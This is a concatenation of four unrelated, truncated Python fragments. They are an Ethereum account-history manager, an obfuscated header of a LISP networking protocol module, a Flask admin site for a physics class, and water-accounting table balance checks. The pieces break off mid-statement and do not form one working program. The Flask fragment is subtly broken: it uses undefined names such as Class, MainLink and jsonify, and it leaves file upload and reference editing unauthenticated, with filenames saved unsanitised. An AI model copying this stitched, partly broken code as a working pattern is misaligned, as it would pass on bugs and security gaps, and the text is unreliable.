_map: Dict[AddressType, List[ReceiptAPI]] = {}
@cached_property
def _convert(self) -> Callable:
return self.conversion_manager.convert
def __getitem__(self, address: Union[BaseAddress, AddressType, str]) -> List[ReceiptAPI]:
"""
Get the list of transactions from the active session for the given address.
Args:
address (``AddressType``): The sender of the desired transactions.
Returns:
List[:class:`~ape.api.transactions.TransactionAPI`]: The list of transactions. If there
are no recorded transactions, returns an empty list.
"""
address_key: AddressType = self._convert(address, AddressType)
explorer = self.provider.network.explorer
explorer_receipts = (
[r for r in explorer.get_account_transactions(address_key)] if explorer else []
)
for receipt in explorer_receipts:
if receipt.txn_hash not in [r.txn_hash for r in self._map.get(address_key, [])]:
self.append(receipt)
return self._map.get(address_key, [])
def __iter__(self) -> Iterator[AddressType]:
"""
Iterate through the accounts listed in the history map.
Returns:
List[str]
"""
yield from self._map
def items(self) -> Iterator[Tuple[AddressType, List[ReceiptAPI]]]:
"""
Iterate through the list of address-types to list of transaction receipts.
Returns:
Iterator[Tuple[``AddressType``, :class:`~ape.api.transactions.ReceiptAPI`]]
"""
yield from self._map.items()
def append(self, txn_receipt: ReceiptAPI):
"""
Add a transaction to the stored list for the given account address.
Raises:
:class:`~ape.exceptions.ChainError`: When trying to append a transaction
receipt that is already in the list.
Args:
txn_receipt (:class:`~ape.api.transactions.ReceiptAPI`): The transaction receipt.
**NOTE**: The receipt is accessible in the list returned from
:meth:`~ape.managers.chain.AccountHistory.__getitem__`.
"""
address = self._convert(txn_receipt.sender, AddressType)
if address not in self._map:
self._map[address] = [txn_receipt]
return
if txn_receipt.txn_hash in [r.txn_hash for r in self._map[address]]:
raise ChainError(f"Transaction '{txn_receipt.txn_hash}' already known.")
self._map[address].append(txn_receipt)
def revert_to_block(self, block_number: int):
"""
Remove all receipts past the given block number.
Args:
block_number (int): The block number to revert to.
"""
self._map = {
a: [r for r in receipts if r.block_number <= block_number]
for a, receipts in self.items()
}
class ContractCache(BaseManager):
"""
A collection of cached contracts. Contracts can be cached in two ways:
1. An in-memory cache of locally deployed contracts
2. A cache of contracts per network (only permanent networks are stored this way)
When retrieving a contract, if a :class:`~ape.api.explorers.ExplorerAPI` is used,
it will be cached to disk for faster look-up next time.
"""
_local_contracts: Dict[AddressType, ContractType] = {}
_local_proxies: Dict[AddressType, ProxyInfoAPI] = {}
@property
def _network(self) -> NetworkAPI:
return self.provider.network
@property
def _is_live_network(self) -> bool:
return self._network.name != LOCAL_NETWORK_NAME and not | |
<filename>build/releases/release-0.499/ob/lisp.py
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - <NAME> <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import Queue
import traceback
from Crypto . Cipher import AES
import ecdsa
import json
import commands
import copy
import chacha
import poly1305
from geopy . distance import vincenty
import curve25519
use_chacha = ( os . getenv ( "LISP_USE_CHACHA" ) != None )
use_poly = ( os . getenv ( "LISP_USE_POLY" ) != None )
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
lisp_print_rloc_probe_list = False
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
if 30 - 30: o0oOOo0O0Ooo - O0 % o0oOOo0O0Ooo - OoooooooOO * O0 * OoooooooOO
if 60 - 60: iIii1I11I1II1 / i1IIi * oO0o - I1ii11iIi11i + o0oOOo0O0Ooo
if 94 - 94: i1IIi % Oo0Ooo
if 68 - 68: Ii1I / O0
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
if 46 - 46: O0 * II111iiii / IiII * Oo0Ooo * iII111i . I11i
lisp_map_notify_queue = { }
lisp_map_servers_list = { }
lisp_ddt_map_requestQ = { }
lisp_db_list = [ ]
lisp_group_mapping_list = { }
lisp_map_resolvers_list = { }
lisp_rtr_list = { }
lisp_elp_list = { }
lisp_rle_list = { }
lisp_geo_list = { }
lisp_json_list = { }
lisp_myrlocs = [ None , None , None ]
lisp_mymacs = { }
if 62 - 62: i11iIiiIii - II111iiii % I1Ii111 - iIii1I11I1II1 . I1ii11iIi11i . II111iiii
if 61 - 61: oO0o / OoOoOO00 / iII111i * OoO0O00 . II111iiii
if 1 - 1: II111iiii - I1ii11iIi11i % i11iIiiIii + IiII . I1Ii111
if 55 - 55: iIii1I11I1II1 - I1IiiI . Ii1I * IiII * i1IIi / iIii1I11I1II1
if 79 - 79: oO0o + I1Ii111 . ooOoO0o * IiII % I11i . I1IiiI
lisp_myinterfaces = { }
lisp_iid_to_interface = { }
lisp_multi_tenant_interfaces = [ ]
if 94 - 94: iII111i * Ii1I / IiII . i1IIi * iII111i
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
if 47 - 47: i1IIi % i11iIiiIii
if 20 - 20: ooOoO0o * II111iiii
if 65 - 65: o0oOOo0O0Ooo * iIii1I11I1II1 * ooOoO0o
if 18 - 18: iIii1I11I1II1 / I11i + oO0o / Oo0Ooo - II111iiii - I11i
lisp_registered_count = 0
if 1 - 1: I11i - OOooOOo % O0 + I1IiiI - iII111i / I11i
if 31 - 31: OoO0O00 + II111iiii
if 13 - 13: OOooOOo * oO0o * I1IiiI
if 55 - 55: II111iiii
lisp_info_sources_by_address = { }
lisp_info_sources_by_nonce = { }
if 43 - 43: OoOoOO00 - i1IIi + I1Ii111 + Ii1I
if 17 - 17: o0oOOo0O0Ooo
if 64 - 64: Ii1I % i1IIi % OoooooooOO
if 3 - 3: iII111i + O0
if 42 - 42: OOooOOo / i1IIi + i11iIiiIii - Ii1I
if 78 - 78: OoO0O00
lisp_crypto_keys_by_nonce = { }
lisp_crypto_keys_by_rloc_encap = { }
lisp_crypto_keys_by_rloc_decap = { }
lisp_data_plane_security = False
lisp_search_decap_keys = True
if 18 - 18: O0 - iII111i / iII111i + ooOoO0o % ooOoO0o - IiII
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
if 62 - 62: iII111i - IiII - OoOoOO00 % i1IIi / oO0o
if 77 - 77: II111iiii - II111iiii . I1IiiI / o0oOOo0O0Ooo
if 14 - 14: I11i % O0
if 41 - 41: i1IIi + I1Ii111 + OOooOOo - IiII
if 77 - 77: Oo0Ooo . IiII % ooOoO0o
if 42 - 42: oO0o - i1IIi / i11iIiiIii + OOooOOo + OoO0O00
if 17 - 17: oO0o . Oo0Ooo . I1ii11iIi11i
lisp_crypto_ephem_port = None
if 3 - 3: OoOoOO00 . Oo0Ooo . I1IiiI / Ii1I
if 38 - 38: II111iiii % i11iIiiIii . ooOoO0o - OOooOOo + Ii1I
if 66 - 66: OoooooooOO * OoooooooOO . OOooOOo . i1IIi - OOooOOo
if 77 - 77: I11i - iIii1I11I1II1
lisp_pitr = False
if 82 - 82: i11iIiiIii . OOooOOo / Oo0Ooo * O0 % oO0o % iIii1I11I1II1
if 78 - 78: iIii1I11I1II1 - Ii1I * OoO0O00 + o0oOOo0O0Ooo + iII111i + iII111i
if 11 - 11: iII111i - OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
if 74 - 74: iII111i * O0
lisp_l2_overlay = False
if 89 - 89: oO0o + Oo0Ooo
if 3 - 3: i1IIi / I1IiiI % I11i * i11iIiiIii / O0 * I11i
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
if 48 - 48: I11i + I11i / II111iiii / iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo
lisp_rloc_probing = False
lisp_rloc_probe_list = { }
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
if 53 - 53: IiII + I1IiiI * oO0o
lisp_register_all_rtrs = True
if 61 - 61: i1IIi * OOooOOo / OoooooooOO . i11iIiiIii . OoOoOO00
if 60 - 60: I11i / I11i
if 46 - 46: Ii1I * OOooOOo - OoO0O00 * oO0o - I1Ii111
if 83 - 83: OoooooooOO
lisp_nonce_echoing = False
lisp_nonce_echo_list = { }
if 31 - 31: II111iiii - OOooOOo . I1Ii111 % OoOoOO00 - O0
if 4 - 4: II111iiii / ooOoO0o . iII111i
if 58 - 58: OOooOOo * i11iIiiIii / OoOoOO00 % I1Ii111 - I1ii11iIi11i / oO0o
if 50 - 50: I1IiiI
lisp_nat_traversal = False
if 34 - 34: I1IiiI * II111iiii % iII111i * OoOoOO00 - I1IiiI
if 33 - 33: o0oOOo0O0Ooo + OOooOOo * OoO0O00 - Oo0Ooo / oO0o % Ii1I
if 21 - 21: OoO0O00 * iIii1I11I1II1 % oO0o * i1IIi
if 16 - 16: O0 - I1Ii111 * iIii1I11I1II1 + iII111i
if 50 - 50: II111iiii - ooOoO0o * I1ii11iIi11i / I1Ii111 + o0oOOo0O0Ooo
if 88 - 88: Ii1I / I1Ii111 + iII111i - II111iiii / ooOoO0o - OoOoOO00
if 15 - 15: I1ii11iIi11i + OoOoOO00 - OoooooooOO / OOooOOo
if 58 - 58: i11iIiiIii % I11i
lisp_program_hardware = False
if 71 - 71: OOooOOo + ooOoO0o % i11iIiiIii + I1ii11iIi11i - IiII
if 88 - 88: OoOoOO00 - OoO0O00 % OOooOOo
if 16 - 16: I1IiiI * oO0o % IiII
if 86 - 86: I1IiiI + Ii1I % i11iIiiIii * oO0o . ooOoO0o * I11i
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
if 44 - 44: oO0o
if 88 - 88: I1Ii111 % Ii1I . II111iiii
if 38 - 38: o0oOOo0O0Ooo
if 57 - 57: O0 / oO0o * I1Ii111 / OoOoOO00 . II111iiii
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
if 26 - 26: iII111i
if 91 - 91: OoO0O00 . I1ii11iIi11i + OoO0O00 - iII111i / OoooooooOO
if 39 - 39: I1ii11iIi11i / ooOoO0o - II111iiii
if 98 - 98: I1ii11iIi11i / I11i % oO0o . OoOoOO00
if 91 - 91: oO0o % Oo0Ooo
lisp_ipc_lock = None
if 64 - 64: I11i % iII111i - I1Ii111 - oO0o
if 31 - 31: I11i - II111iiii . I11i
if 18 - 18: o0oOOo0O0Ooo
if 98 - 98: iII111i * iII111i / iII111i + I11i
if 34 - 34: ooOoO0o
if 15 - 15: I11i * ooOoO0o * Oo0Ooo % i11iIiiIii % OoOoOO00 - OOooOOo
lisp_default_iid = 0
if 68 - 68: I1Ii111 % i1IIi . IiII . I1ii11iIi11i
if 92 - 92: iII111i . I1Ii111
if 31 - 31: I1Ii111 . OoOoOO00 / O0
if 89 - 89: OoOoOO00
if 68 - 68: OoO0O00 * OoooooooOO % O0 + OoO0O00 + ooOoO0o
lisp_ms_rtr_list = [ ]
if 4 - 4: ooOoO0o + O0 * OOooOOo
if 55 - 55: Oo0Ooo + iIii1I11I1II1 / OoOoOO00 * oO0o - i11iIiiIii - Ii1I
if 25 - 25: I1ii11iIi11i
if 7 - 7: i1IIi / | |
'''
HTML is only at main link text, class log, hw, and additional
TODO
Verify MainLink content
Resource files
(Modify rendering options?)
TODO
Form validation! I need to make sure Dr. Dann doesn't enter any weird html
Verify main link content
Visual
Carousel Item
Angular preview
Force image to be a certain size
'''
#Import useful packages and objects
from flask import render_template, flash, redirect, url_for, request, session, Response
from functools import wraps
from datetime import datetime as dt
from calendar import timegm
import time
import json
from os import listdir
import os.path
from app import app, db, bcrypt
from models import Unit, Lesson, CarouselItem, Reference
from config import basedir, ADMIN_USERNAME, ADMIN_PASSWORD
#8 hours, in seconds
PST_OFFSET = 8 * 60 * 60
# #############
# Authorization
# #############
def check_auth(username, password):
"""Checks to see if a username/password combination is valid"""
if username == ADMIN_USERNAME and bcrypt.check_password_hash(ADMIN_PASSWORD, password):
session['authorized'] = True
return True
return False
def authenticate():
"""Sends a 401 response that enables basic auth"""
return Response("Error! Could not verify your access level for that URL. You have to login with proper credentials.",
401, #Response code
{'WWW-Authenticate': 'Basic realm="Login Required"'}) #Headers
def requires_auth(f):
@wraps(f)
def decorated(*args, **kwargs):
auth = request.authorization #Have they validated previously?
if not auth or not check_auth(auth.username, auth.password) or not session.get('authorized'):
return authenticate()
return f(*args, **kwargs)
return decorated
# ##################
# APPLICATION ROUTES
# ##################
@app.route('/')
@app.route('/index/')
def index():
return render_template('app/index.html',
title = 'Home',
carousel_items=CarouselItem.query.all(),
references=Reference.query.all())
@app.route('/loghw/')
def loghw():
seconds_since_epoch = time.time()
current_datetime = dt.utcfromtimestamp(seconds_since_epoch - PST_OFFSET)
current_day_of_week = int(current_datetime.strftime("%w")) #1 is monday
current_week_of_year = int(current_datetime.strftime("%W"))
current_lessons = get_lessons_from_week(current_week_of_year)
# flash("Beyond simple harmonic motion, the class information was copied from last year's schedule. Dr. Dann will have to update it to correspond to this year (e.g. correct days for HIWW, etc). Once he does, this warning message will disappear forever.",category='warning')
return render_template('app/loghw.html',
title='Class Log and HW',
units=Unit.query.filter(Unit.visible).all(),
lessons=current_lessons,
day_of_week=current_day_of_week)
# ##############
# ADMINISTRATIVE
# ##############
@app.route('/admin/')
@requires_auth
def admin():
return render_template('admin/admin.html',
title="Administrator",
units=Unit.query.all(),
lessons=Lesson.query.all(),
items=CarouselItem.query.all(),
references=Reference.query.all())
# Edit the database as JSON
@app.route('/edit/', methods=['GET','POST'])
@requires_auth
def edit():
if request.method == 'GET':
unit_models = Unit.query.all();
class_models=Class.query.all();
carousel_item_models=CarouselItem.query.all();
main_link_models=MainLink.query.all();
#Construct all the JSON maps
content=[unit_model.toJSON() for unit_model in unit_models]
dates=[class_model.pst_datetime.strftime('%m/%d/%y') for class_model in class_models]
carousel_items = [carousel_item_model.toJSON() for carousel_item_model in carousel_item_models]
main_links = [main_link_model.toJSON() for main_link_model in main_link_models]
return render_template('edit.html',
content=formatJSON(content),
carousel_items=formatJSON(carousel_items),
main_links=formatJSON(main_links),
dates=formatJSON(dates),
title="Edit JSON")
else: #POST method
# try: #Todo - better error catching
data = json.loads(request.form['all'])
# for key, value in data.iteritems():
# print key, value
content, dates, carousel_items, main_links = data['content'], data['dates'], data['carousel_items'], data['main_links']
print content, dates, carousel_items, main_links
#Seconds since epoch at which a new PST day w/ physics begins
epoch_day_offsets = [timegm(time.strptime(t, "%m/%d/%y")) for t in dates]
#Zip time info into the topics dictionary
date_iter = iter(epoch_day_offsets)
new_units = []
#Populate the topics into their respective units, with the dates loaded in too
for unit in content:
unit_model = Unit()
unit_model.title=unit['title']
unit_model.description=unit['description']
unit_model.visible = unit['visible']
for cl in unit['classes']:
class_model = Class() #Make an empty model
#Fill it with topical values
for item in cl['items']:
class_model.addItem(item)
class_model.homework=cl['homework']
if 'additional' in cl:
class_model.additional = cl['additional']
#Fill it with time values (could mess up here)
t = date_iter.next() #Seconds since epoch of a new UTC day - could throw an error
pst_dt = dt.utcfromtimestamp(t) #Datetime representing the local date and time
class_model.epoch_time = t + PST_OFFSET #Seconds since epoch of a new PST day
class_model.pst_datetime = pst_dt
class_model.day_of_week = int(pst_dt.strftime("%w")) #1 = Monday, 2 = Tuesday, ..., 5 = Friday
class_model.week_of_year = int(pst_dt.strftime("%W"))
unit_model.addClass(class_model)
new_units.append(unit_model)
new_carousel_items = []
#Add carousel items
for item in carousel_items:
new_item = CarouselItem()
if 'title' in item:
new_item.title=item['title']
if 'description' in item:
new_item.description=item['description']
if 'src' in item:
new_item.src=item['src']
if 'alt' in item:
new_item.alt=item['alt']
new_carousel_items.append(new_item)
new_main_links = []
for link in main_links:
new_link = MainLink()
if 'link' in link:
new_link.link = link['link']
if 'media-type' in link:
new_link.media_type = link['media-type']
new_main_links.append(new_link);
#Now that we have all the models, clear the database and push all the new values on
Unit.query.delete()
Class.query.delete()
CarouselItem.query.delete()
MainLink.query.delete()
for unit_model in new_units:
db.session.add(unit_model)
for carousel_item_model in new_carousel_items:
db.session.add(carousel_item_model)
for main_link_model in new_main_links:
db.session.add(main_link_model)
db.session.commit()
flash('Successfully updated database to reflect changes')
# # except Exception as e:
# print "Error: " + repr(e)
# flash('Uncaught Exception: {0}'.format(e), category='error')
return redirect(url_for('admin'))
@app.route('/getAll/', methods=['GET'])
def getAll():
unit_models = Unit.query.all();
class_models=Class.query.all();
carousel_item_models=CarouselItem.query.all();
main_link_models=MainLink.query.all();
#Construct all the JSON maps
content=[unit_model.toJSON() for unit_model in unit_models]
dates=[class_model.pst_datetime.strftime('%m/%d/%y') for class_model in class_models]
carousel_items = [carousel_item_model.toJSON() for carousel_item_model in carousel_item_models]
main_links = [main_link_model.toJSON() for main_link_model in main_link_models]
out = {}
out['content']=content
out['carousel_items']=carousel_items
out['main_links']=main_links
out['dates']=dates
return json.dumps(out)
@app.route('/help/')
def help():
return render_template('admin/help.html',
title="Help")
# ############
# Upload Files
# ############
@app.route('/upload/', methods=['GET'])
def upload():
return render_template('upload.html')
@app.route('/+upload/', methods=['GET', 'POST'])
def uploadAux():
print request
print request.files
if request.method == 'GET':
# we are expected to return a list of dicts with infos about the already available files:
file_infos = []
for file_name in list_files():
file_url = url_for('download', file_name=file_name)
file_size = get_file_size(file_name)
file_infos.append(dict(name=file_name,
size=file_size,
url=file_url))
return jsonify(files=file_infos)
if request.method == 'POST':
# we are expected to save the uploaded file and return some infos about it:
# vvvvvvvvv this is the name for input type=file
data_file = request.files.get('data_files')
file_name = data_file.filename
save_file(data_file, file_name)
file_size = get_file_size(file_name)
file_url = url_for('download', file_name=file_name)
# providing the thumbnail url is optional
thumbnail_url = url_for('thumbnail', file_name=file_name)
return jsonify(name=file_name,
size=file_size,
url=file_url,
thumbnail=thumbnail_url)
# ###########################
# Edit/Update Model Instances
# ###########################
# Edit a particular Unit
@app.route('/units/edit/<int:unit_id>/', methods=['GET', 'POST'])
@requires_auth
def edit_unit(unit_id):
# Does this unit exist?
unit = Unit.query.get(unit_id)
if not unit:
flash("Unit with ID of `{0}` does not exist.".format(unit_id), category='error')
return redirect(url_for('admin'))
# Edit
if request.method == 'GET':
return render_template('admin/edit_unit.html',
unit=unit)
# Update
else:
f = request.form
if 'title' not in f or 'description' not in f or 'media-type' not in f:
flash("A Unit must contain a title and description. Did not update Unit {0}".format(unit_id), category='error')
return redirect(url_for('admin'))
unit.title = f['title']
unit.description = f['description']
db.session.add(unit)
db.session.commit()
flash("Successfully updated Unit #{0}: {1}".format(unit_id, unit.title), category='message')
return redirect(url_for('admin'))
# Edit a particular Lesson
@app.route('/lessons/edit/<int:lesson_id>/', methods=['GET', 'POST'])
@requires_auth
def edit_lesson(lesson_id):
# Does this lesson exist?
lesson = Lesson.query.get(lesson_id)
if not lesson:
flash("A Lesson with ID of `{0}` does not exist.".format(lesson_id), category='error')
return redirect(url_for('admin'))
# Edit
if request.method == 'GET':
return render_template('admin/edit_lesson.html',
lesson=lesson)
# Update
else:
# All fields can contain HTML, so we need to validate here.
# TODO More efficient method
f = request.form
lesson.clearItems()
items = [f['log1'],f['log2'],f['log3'],f['log4'],f['log5'],f['log6']]
for i in items:
i = i.strip()
# TODO Additional validation
if i != "":
lesson.addItem(i)
lesson.homework = request.form['homework'] # TODO Additional validation
lesson.additional = request.form['additional'] # TODO Additional validation
db.session.add(lesson)
db.session.commit()
flash("Successfully updated Lesson #{0}".format(class_id))
return redirect(url_for('admin'))
# Edit a particular CarouselItem
@app.route("/carousel/edit/<int:item_id>", methods=['GET','POST'])
@requires_auth
def edit_carousel(item_id):
# Does this carousel item exist?
item = CarouselItem.query.get(item_id)
if not item:
flash("Carousel Item with ID of `{0}` does not exist.".format(item_id), category='error')
return redirect(url_for('admin'))
# Edit
if request.method == 'GET': #GET method
return render_template('edit_carousel_item.html',
item=item)
# Update
else:
f = request.form
if 'title' not in f or 'description' not in f or 'src' not in f:
flash("A Carousel Item must contain a title, description, and src. Did not update Carousel Item {0}".format(item_id), category='error')
return redirect(url_for('admin'))
item.title = f['title']
item.description = f['description']
item.src = f['src']
item.alt = f.get('alt') # Could be None
db.session.add(item)
db.session.commit()
flash("Successfully updated Carousel Item #{0}: {1}".format(item_id, item.title), category='message')
return redirect(url_for('admin'))
# Edit a particular Reference
@app.route('/references/edit/<int:reference_id>', methods=['GET','POST'])
def edit_reference(reference_id):
#Does this reference exist?
ref = Reference.query.get(reference_id)
if not ref:
flash("Reference with ID of `{0}` does not exist.".format(reference_id), category='error')
return redirect(url_for('admin'))
# Edit
if request.method == 'GET':
return render_template('admin/edit_reference.html',
ref=ref)
# Update
else:
f = request.form
if 'title' not in f or 'href' not in f or 'media-type' not in f:
flash("References must contain a title, href, and media-type. Did not update Reference {0}".format(reference_id), category='error')
return redirect(url_for('admin'))
ref.title = f['title']
ref.href = f['href'] # TODO Check for bad things here
ref.media_type = f['media-type']
db.session.add(ref)
db.session.commit()
flash("Updated Reference #{0}: `{1}` ({2}) linked to `{3}`".format(reference_id, ref.title, ref.media_type, ref.href), category='message')
return redirect(url_for('admin'))
# ##############
# ERROR HANDLERS
# ##############
@app.errorhandler(404) # 404 = Page Not Found
def internal_error(error):
return render_template('static/404.html'), 404
@app.errorhandler(500) # 500 = Internal server error
def internal_error(error):
db.session.rollback() # Rollback the database in case a database error triggered the 500
return render_template('static/500.html'), 500
# #############
# MISCELLANEOUS
# #############
@app.route('/tests/')
def tests():
# TODO | |
c3r7_t1 + c4r7_t1
c5r1_t1_right = r1_t1_bene + c11r1_t1
c5r2_t1_right = r2_t1_bene + c11r2_t1
c5r3_t1_right = r3_t1_bene + c11r3_t1
c5r4_t1_right = r4_t1_bene + c11r4_t1
c5r5_t1_right = r5_t1_bene + c11r5_t1
c5r6_t1_right = r6_t1_bene + c11r6_t1
c5r7_t1_right = r7_t1_bene + c11r7_t1
# Table 2
r1_t2_bene = c6r1_t2 + c7r1_t2 + c8r1_t2 + c9r1_t2 + c10r1_t2
r2_t2_bene = c6r2_t2 + c7r2_t2 + c8r2_t2 + c9r2_t2 + c10r2_t2
r3_t2_bene = c6r3_t2 + c7r3_t2 + c8r3_t2 + c9r3_t2 + c10r3_t2
r4_t2_bene = c6r4_t2 + c7r4_t2 + c8r4_t2 + c9r4_t2 + c10r4_t2
r5_t2_bene = c6r5_t2 + c7r5_t2 + c8r5_t2 + c9r5_t2 + c10r5_t2
r6_t2_bene = c6r6_t2 + c7r6_t2 + c8r6_t2 + c9r6_t2 + c10r6_t2
c5r1_t2_left = c1r1_t2 + c2r1_t2 + c3r1_t2 + c4r1_t2
c5r2_t2_left = c1r2_t2 + c2r2_t2 + c3r2_t2 + c4r2_t2
c5r3_t2_left = c1r3_t2 + c2r3_t2 + c3r3_t2 + c4r3_t2
c5r4_t2_left = c1r4_t2 + c2r4_t2 + c3r4_t2 + c4r4_t2
c5r5_t2_left = c1r5_t2 + c2r5_t2 + c3r5_t2 + c4r5_t2
c5r6_t2_left = c1r6_t2 + c2r6_t2 + c3r6_t2 + c4r6_t2
c5r1_t2_right = r1_t2_bene + c11r1_t2
c5r2_t2_right = r2_t2_bene + c11r2_t2
c5r3_t2_right = r3_t2_bene + c11r3_t2
c5r4_t2_right = r4_t2_bene + c11r4_t2
c5r5_t2_right = r5_t2_bene + c11r5_t2
c5r6_t2_right = r6_t2_bene + c11r6_t2
# Table 3
r1_t3_bene = c6r1_t3 + c7r1_t3 + c8r1_t3 + c9r1_t3 + c10r1_t3
r2_t3_bene = c6r2_t3 + c7r2_t3 + c8r2_t3 + c9r2_t3 + c10r2_t3
r3_t3_bene = c6r3_t3 + c7r3_t3 + c8r3_t3 + c9r3_t3 + c10r3_t3
r4_t3_bene = c6r4_t3 + c7r4_t3 + c8r4_t3 + c9r4_t3 + c10r4_t3
c5r1_t3_left = c1r1_t3 + c2r1_t3 + c3r1_t3 + c4r1_t3
c5r2_t3_left = c1r2_t3 + c2r2_t3 + c3r2_t3 + c4r2_t3
c5r3_t3_left = c1r3_t3 + c2r3_t3 + c3r3_t3 + c4r3_t3
c5r4_t3_left = c1r4_t3 + c2r4_t3 + c3r4_t3 + c4r4_t3
c5r1_t3_right = r1_t3_bene + c11r1_t3
c5r2_t3_right = r2_t3_bene + c11r2_t3
c5r3_t3_right = r3_t3_bene + c11r3_t3
c5r4_t3_right = r4_t3_bene + c11r4_t3
# Table 4
r1_t4_bene = c6r1_t4 + c7r1_t4 + c8r1_t4 + c9r1_t4 + c10r1_t4
r2_t4_bene = c6r2_t4 + c7r2_t4 + c8r2_t4 + c9r2_t4 + c10r2_t4
r3_t4_bene = c6r3_t4 + c7r3_t4 + c8r3_t4 + c9r3_t4 + c10r3_t4
r4_t4_bene = c6r4_t4 + c7r4_t4 + c8r4_t4 + c9r4_t4 + c10r4_t4
r5_t4_bene = c6r5_t4 + c7r5_t4 + c8r5_t4 + c9r5_t4 + c10r5_t4
c5r1_t4_left = c1r1_t4 + c2r1_t4 + c3r1_t4 + c4r1_t4
c5r2_t4_left = c1r2_t4 + c2r2_t4 + c3r2_t4 + c4r2_t4
c5r3_t4_left = c1r3_t4 + c2r3_t4 + c3r3_t4 + c4r3_t4
c5r4_t4_left = c1r4_t4 + c2r4_t4 + c3r4_t4 + c4r4_t4
c5r5_t4_left = c1r5_t4 + c2r5_t4 + c3r5_t4 + c4r5_t4
c5r1_t4_right = r1_t4_bene + c11r1_t4
c5r2_t4_right = r2_t4_bene + c11r2_t4
c5r3_t4_right = r3_t4_bene + c11r3_t4
c5r4_t4_right = r4_t4_bene + c11r4_t4
c5r5_t4_right = r5_t4_bene + c11r5_t4
# Table 5
r1_t5_bene = c6r1_t5 + c7r1_t5 + c8r1_t5 + c9r1_t5 + c10r1_t5
r2_t5_bene = c6r2_t5 + c7r2_t5 + c8r2_t5 + c9r2_t5 + c10r2_t5
r3_t5_bene = c6r3_t5 + c7r3_t5 + c8r3_t5 + c9r3_t5 + c10r3_t5
r4_t5_bene = c6r4_t5 + c7r4_t5 + c8r4_t5 + c9r4_t5 + c10r4_t5
r5_t5_bene = c6r5_t5 + c7r5_t5 + c8r5_t5 + c9r5_t5 + c10r5_t5
r6_t5_bene = c6r6_t5 + c7r6_t5 + c8r6_t5 + c9r6_t5 + c10r6_t5
c5r1_t5_left = c1r1_t5 + c2r1_t5 + c3r1_t5 + c4r1_t5
c5r2_t5_left = c1r2_t5 + c2r2_t5 + c3r2_t5 + c4r2_t5
c5r3_t5_left = c1r3_t5 + c2r3_t5 + c3r3_t5 + c4r3_t5
c5r4_t5_left = c1r4_t5 + c2r4_t5 + c3r4_t5 + c4r4_t5
c5r5_t5_left = c1r5_t5 + c2r5_t5 + c3r5_t5 + c4r5_t5
c5r6_t5_left = c1r6_t5 + c2r6_t5 + c3r6_t5 + c4r6_t5
c5r1_t5_right = r1_t5_bene + c11r1_t5
c5r2_t5_right = r2_t5_bene + c11r2_t5
c5r3_t5_right = r3_t5_bene + c11r3_t5
c5r4_t5_right = r4_t5_bene + c11r4_t5
c5r5_t5_right = r5_t5_bene + c11r5_t5
c5r6_t5_right = r6_t5_bene + c11r6_t5
# t1
if abs(c5r1_t1_left - c5r1_t1_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('PROTECTED', 'Forest'))
elif abs(c5r2_t1_left - c5r2_t1_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('PROTECTED', 'Shrubland'))
elif abs(c5r3_t1_left - c5r3_t1_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('PROTECTED',
'Natural grasslands'))
elif abs(c5r4_t1_left - c5r4_t1_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('PROTECTED',
'Natural water bodies'))
elif abs(c5r5_t1_left - c5r5_t1_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('PROTECTED', 'Wetlands'))
elif abs(c5r6_t1_left - c5r6_t1_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('PROTECTED', 'Glaciers'))
elif abs(c5r7_t1_left - c5r7_t1_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('PROTECTED', 'Others'))
# t2
elif abs(c5r1_t2_left - c5r1_t2_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('UTILIZED', 'Forest'))
elif abs(c5r2_t2_left - c5r2_t2_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
